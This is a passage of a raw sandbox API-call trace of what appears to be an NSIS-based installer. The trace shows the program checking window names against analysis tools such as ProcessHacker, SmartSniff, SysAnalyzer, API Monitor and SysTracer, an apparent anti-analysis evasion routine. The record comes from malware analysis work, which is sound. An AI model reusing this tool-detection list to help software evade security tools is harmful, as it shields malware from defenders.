returned="tooltips_class32" [0158.572] lstrlenA (lpString="tooltips_class32") returned 16 [0158.572] lstrcpynA (in: lpString1=0x40ac18, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.572] lstrcpynA (in: lpString1=0x40b018, lpString2="ProcessLasso_Notification_Class", iMaxLength=1024 | out: lpString1="ProcessLasso_Notification_Class") returned="ProcessLasso_Notification_Class" [0158.572] lstrcmpiA (lpString1="tooltips_class32", lpString2="ProcessLasso_Notification_Class") returned 1 [0158.572] lstrcpynA (in: lpString1=0x42e3a0, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.572] lstrlenA (lpString="tooltips_class32") returned 16 [0158.572] lstrcpynA (in: lpString1=0x40ac18, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.572] lstrcpynA (in: lpString1=0x40b018, lpString2="SmartSniff", iMaxLength=1024 | out: lpString1="SmartSniff") returned="SmartSniff" [0158.572] lstrcmpiA (lpString1="tooltips_class32", lpString2="SmartSniff") returned 1 [0158.572] lstrcpynA (in: lpString1=0x42e3a0, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.572] lstrlenA (lpString="tooltips_class32") returned 16 [0158.572] lstrcpynA (in: lpString1=0x40ac18, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.572] lstrcpynA (in: lpString1=0x40b018, lpString2="ProcessHacker", iMaxLength=1024 | out: lpString1="ProcessHacker") returned="ProcessHacker" [0158.572] lstrcmpiA (lpString1="tooltips_class32", lpString2="ProcessHacker") returned 1 [0158.572] lstrcpynA (in: lpString1=0x42e3a0, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.572] lstrlenA (lpString="tooltips_class32") returned 16 
[0158.572] lstrcpynA (in: lpString1=0x40ac18, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.572] lstrcpynA (in: lpString1=0x40b018, lpString2="{0843FD01-1D28-44a3-B11D-E3A93A85EA96}", iMaxLength=1024 | out: lpString1="{0843FD01-1D28-44a3-B11D-E3A93A85EA96}") returned="{0843FD01-1D28-44a3-B11D-E3A93A85EA96}" [0158.572] lstrcmpiA (lpString1="tooltips_class32", lpString2="{0843FD01-1D28-44a3-B11D-E3A93A85EA96}") returned 1 [0158.572] lstrcpynA (in: lpString1=0x42e3a0, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.572] lstrlenA (lpString="tooltips_class32") returned 16 [0158.572] lstrcpynA (in: lpString1=0x40ac18, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.572] lstrcpynA (in: lpString1=0x40b018, lpString2="SysAnalyzer", iMaxLength=1024 | out: lpString1="SysAnalyzer") returned="SysAnalyzer" [0158.572] lstrcmpiA (lpString1="tooltips_class32", lpString2="SysAnalyzer") returned 1 [0158.572] lstrcpynA (in: lpString1=0x42e3a0, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.572] lstrlenA (lpString="tooltips_class32") returned 16 [0158.572] lstrcpynA (in: lpString1=0x40ac18, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.572] lstrcpynA (in: lpString1=0x40b018, lpString2="VMSwitchUserControlClass", iMaxLength=1024 | out: lpString1="VMSwitchUserControlClass") returned="VMSwitchUserControlClass" [0158.572] lstrcmpiA (lpString1="tooltips_class32", lpString2="VMSwitchUserControlClass") returned -1 [0158.572] lstrcpynA (in: lpString1=0x42e3a0, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.572] lstrlenA (lpString="tooltips_class32") returned 16 [0158.572] lstrcpynA 
(in: lpString1=0x40ac18, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.572] lstrcpynA (in: lpString1=0x40b018, lpString2="ProcessHacker", iMaxLength=1024 | out: lpString1="ProcessHacker") returned="ProcessHacker" [0158.573] lstrcmpiA (lpString1="tooltips_class32", lpString2="ProcessHacker") returned 1 [0158.573] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.573] lstrlenA (lpString="") returned 0 [0158.573] lstrcpynA (in: lpString1=0x40ac18, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.573] lstrcpynA (in: lpString1=0x40b018, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.573] lstrcmpiA (lpString1="", lpString2="0") returned -1 [0158.573] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.573] lstrlenA (lpString="") returned 0 [0158.573] lstrcpynA (in: lpString1=0x33723c, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.573] lstrcpynA (in: lpString1=0x337684, lpString2="- main thread", iMaxLength=1024 | out: lpString1="- main thread") returned="- main thread" [0158.573] lstrcpynA (in: lpString1=0x42e3a0, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.573] lstrlenA (lpString="3399936") returned 7 [0158.573] lstrcpynA (in: lpString1=0x337acc, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.573] lstrcpynA (in: lpString1=0x40a418, lpString2="- main thread", iMaxLength=1024 | out: lpString1="- main thread") returned="- main thread" [0158.573] lstrcpynA (in: lpString1=0x337684, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.573] lstrcpynA (in: lpString1=0x337acc, lpString2="- main thread", iMaxLength=1024 | out: lpString1="- main thread") returned="- main thread" [0158.573] lstrcpynA (in: 
lpString1=0x432800, lpString2="- main thread", iMaxLength=1024 | out: lpString1="- main thread") returned="- main thread" [0158.573] lstrcpynA (in: lpString1=0x40a418, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.573] lstrcpynA (in: lpString1=0x33723c, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.573] lstrcpynA (in: lpString1=0x337684, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.574] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.574] lstrlenA (lpString="") returned 0 [0158.574] lstrcpynA (in: lpString1=0x337acc, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.574] lstrcpynA (in: lpString1=0x40a418, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.574] lstrcpynA (in: lpString1=0x337684, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.574] lstrcpynA (in: lpString1=0x337acc, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.574] lstrcpynA (in: lpString1=0x432c00, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.574] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.574] lstrlenA (lpString="") returned 0 [0158.574] lstrcpynA (in: lpString1=0x337acc, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.574] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.574] lstrlenA (lpString="") returned 0 [0158.574] lstrcpynA (in: lpString1=0x337f14, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.574] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.574] lstrcpynA (in: 
lpString1=0x40ac18, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.574] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.574] lstrcmpiA (lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0158.574] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.575] lstrcpynA (in: lpString1=0x40b018, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.575] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.575] lstrcpynA (in: lpString1=0x33835c, lpString2="ntdll::strstr(t R1, t R0)i.R0 ?c", iMaxLength=1024 | out: lpString1="ntdll::strstr(t R1, t R0)i.R0 ?c") returned="ntdll::strstr(t R1, t R0)i.R0 ?c" [0158.575] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.575] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: 
lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.575] lstrcpynA (in: lpString1=0x40a418, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0158.576] GetModuleHandleA (lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned 0x75710000 [0158.576] GetProcAddress (hModule=0x75710000, lpProcName="Call") returned 0x757116df [0158.576] lstrcpyA (in: lpString1=0x340df8, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.576] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.576] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.576] lstrcpynA (in: lpString1=0x340df8, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.576] lstrcpynA (in: lpString1=0x341200, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.576] lstrcpynA (in: lpString1=0x340df8, lpString2="- main thread", iMaxLength=1024 | out: lpString1="- main thread") returned="- main thread" [0158.576] lstrcpynA (in: lpString1=0x3401e0, lpString2="- main thread", iMaxLength=1024 | out: lpString1="- main thread") returned="- main thread" [0158.576] lstrcpynA (in: lpString1=0x340df8, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.576] strstr (_Str="", _SubStr="- main thread") returned 0x0 [0158.577] lstrcpynA (in: lpString1=0x340df8, lpString2="- main thread", iMaxLength=1024 | out: lpString1="- main thread") returned="- main thread" [0158.577] lstrcpynA (in: lpString1=0x340df8, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.577] wsprintfA (in: param_1=0x340df8, param_2="%d" | out: param_1="0") returned 1 [0158.577] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.577] lstrcpynA (in: lpString1=0x433400, 
lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.577] lstrcpynA (in: lpString1=0x433000, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.577] lstrcpynA (in: lpString1=0x432c00, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.577] lstrcpynA (in: lpString1=0x42e3a0, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.577] lstrlenA (lpString="0") returned 1 [0158.577] lstrcpynA (in: lpString1=0x337684, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.577] lstrcpynA (in: lpString1=0x40a418, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.577] lstrcpynA (in: lpString1=0x33723c, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.577] lstrcpynA (in: lpString1=0x337684, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.577] lstrcpynA (in: lpString1=0x432800, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.577] lstrcpynA (in: lpString1=0x430000, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.577] lstrcpynA (in: lpString1=0x42e3a0, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.577] lstrlenA (lpString="0") returned 1 [0158.577] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.577] lstrlenA (lpString="") returned 0 [0158.577] lstrcpynA (in: lpString1=0x33723c, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.578] lstrcpynA (in: lpString1=0x337684, lpString2="API Monitor", iMaxLength=1024 | out: lpString1="API Monitor") returned="API Monitor" [0158.578] lstrcpynA (in: lpString1=0x42e3a0, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.578] lstrlenA (lpString="3399936") returned 7 [0158.578] lstrcpynA (in: lpString1=0x337acc, lpString2="3399936", iMaxLength=1024 | out: 
lpString1="3399936") returned="3399936" [0158.578] lstrcpynA (in: lpString1=0x40a418, lpString2="API Monitor", iMaxLength=1024 | out: lpString1="API Monitor") returned="API Monitor" [0158.578] lstrcpynA (in: lpString1=0x337684, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.578] lstrcpynA (in: lpString1=0x337acc, lpString2="API Monitor", iMaxLength=1024 | out: lpString1="API Monitor") returned="API Monitor" [0158.578] lstrcpynA (in: lpString1=0x432800, lpString2="API Monitor", iMaxLength=1024 | out: lpString1="API Monitor") returned="API Monitor" [0158.578] lstrcpynA (in: lpString1=0x40a418, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.578] lstrcpynA (in: lpString1=0x33723c, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.578] lstrcpynA (in: lpString1=0x337684, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.578] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.578] lstrlenA (lpString="") returned 0 [0158.578] lstrcpynA (in: lpString1=0x337acc, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.578] lstrcpynA (in: lpString1=0x40a418, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.578] lstrcpynA (in: lpString1=0x337684, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.578] lstrcpynA (in: lpString1=0x337acc, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.578] lstrcpynA (in: lpString1=0x432c00, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.578] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.578] lstrlenA (lpString="") returned 0 [0158.578] lstrcpynA (in: lpString1=0x337acc, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.578] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: 
lpString1="") returned="" [0158.578] lstrlenA (lpString="") returned 0 [0158.578] lstrcpynA (in: lpString1=0x337f14, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.578] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.579] lstrcpynA (in: lpString1=0x40ac18, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.579] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.579] lstrcmpiA (lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0158.579] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.579] lstrcpynA (in: lpString1=0x40b018, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.579] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.579] lstrcpynA (in: lpString1=0x33835c, lpString2="ntdll::strstr(t R1, t R0)i.R0 ?c", iMaxLength=1024 | out: lpString1="ntdll::strstr(t R1, t R0)i.R0 ?c") 
returned="ntdll::strstr(t R1, t R0)i.R0 ?c" [0158.579] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.579] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.579] lstrcpynA (in: lpString1=0x40a418, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0158.579] GetModuleHandleA (lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned 0x75710000 [0158.580] GetProcAddress (hModule=0x75710000, lpProcName="Call") returned 0x757116df [0158.580] lstrcpyA (in: lpString1=0x341200, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.580] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.580] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.580] lstrcpynA (in: lpString1=0x341200, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.580] lstrcpynA (in: lpString1=0x340df8, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.580] lstrcpynA (in: lpString1=0x341200, lpString2="API Monitor", iMaxLength=1024 | out: lpString1="API Monitor") returned="API Monitor" [0158.580] lstrcpynA (in: lpString1=0x3401e0, lpString2="API Monitor", iMaxLength=1024 | out: lpString1="API Monitor") returned="API Monitor" [0158.580] lstrcpynA (in: lpString1=0x341200, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.580] strstr (_Str="", _SubStr="API Monitor") returned 0x0 [0158.580] lstrcpynA (in: 
lpString1=0x341200, lpString2="API Monitor", iMaxLength=1024 | out: lpString1="API Monitor") returned="API Monitor" [0158.580] lstrcpynA (in: lpString1=0x341200, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.580] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="0") returned 1 [0158.580] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.581] lstrcpynA (in: lpString1=0x433400, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.581] lstrcpynA (in: lpString1=0x433000, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.581] lstrcpynA (in: lpString1=0x432c00, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.581] lstrcpynA (in: lpString1=0x42e3a0, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.581] lstrlenA (lpString="0") returned 1 [0158.581] lstrcpynA (in: lpString1=0x337684, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.581] lstrcpynA (in: lpString1=0x40a418, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.581] lstrcpynA (in: lpString1=0x33723c, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.581] lstrcpynA (in: lpString1=0x337684, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.581] lstrcpynA (in: lpString1=0x432800, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.581] lstrcpynA (in: lpString1=0x430000, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.581] lstrcpynA (in: lpString1=0x42e3a0, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.581] lstrlenA (lpString="0") returned 1 [0158.581] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.581] lstrlenA (lpString="") returned 0 [0158.581] lstrcpynA (in: lpString1=0x33723c, lpString2="", 
iMaxLength=1024 | out: lpString1="") returned="" [0158.581] lstrcpynA (in: lpString1=0x337684, lpString2="Blue Project Software SysTracer", iMaxLength=1024 | out: lpString1="Blue Project Software SysTracer") returned="Blue Project Software SysTracer" [0158.581] lstrcpynA (in: lpString1=0x42e3a0, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.581] lstrlenA (lpString="3399936") returned 7 [0158.581] lstrcpynA (in: lpString1=0x337acc, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.581] lstrcpynA (in: lpString1=0x40a418, lpString2="Blue Project Software SysTracer", iMaxLength=1024 | out: lpString1="Blue Project Software SysTracer") returned="Blue Project Software SysTracer" [0158.581] lstrcpynA (in: lpString1=0x337684, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.581] lstrcpynA (in: lpString1=0x337acc, lpString2="Blue Project Software SysTracer", iMaxLength=1024 | out: lpString1="Blue Project Software SysTracer") returned="Blue Project Software SysTracer" [0158.582] lstrcpynA (in: lpString1=0x432800, lpString2="Blue Project Software SysTracer", iMaxLength=1024 | out: lpString1="Blue Project Software SysTracer") returned="Blue Project Software SysTracer" [0158.582] lstrcpynA (in: lpString1=0x40a418, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.582] lstrcpynA (in: lpString1=0x33723c, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.582] lstrcpynA (in: lpString1=0x337684, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.582] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.582] lstrlenA (lpString="") returned 0 [0158.582] lstrcpynA (in: lpString1=0x337acc, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.582] lstrcpynA (in: lpString1=0x40a418, lpString2="", iMaxLength=1024 | out: 
lpString1="") returned="" [0158.582] lstrcpynA (in: lpString1=0x337684, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.582] lstrcpynA (in: lpString1=0x337acc, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.582] lstrcpynA (in: lpString1=0x432c00, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.582] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.582] lstrlenA (lpString="") returned 0 [0158.582] lstrcpynA (in: lpString1=0x337acc, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.582] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.582] lstrlenA (lpString="") returned 0 [0158.582] lstrcpynA (in: lpString1=0x337f14, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.582] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.582] lstrcpynA (in: lpString1=0x40ac18, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.582] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.582] lstrcmpiA (lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0158.582] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.582] lstrcpynA (in: lpString1=0x40b018, 
lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.582] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.583] lstrcpynA (in: lpString1=0x33835c, lpString2="ntdll::strstr(t R1, t R0)i.R0 ?c", iMaxLength=1024 | out: lpString1="ntdll::strstr(t R1, t R0)i.R0 ?c") returned="ntdll::strstr(t R1, t R0)i.R0 ?c" [0158.583] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.583] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.583] lstrcpynA (in: lpString1=0x40a418, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") 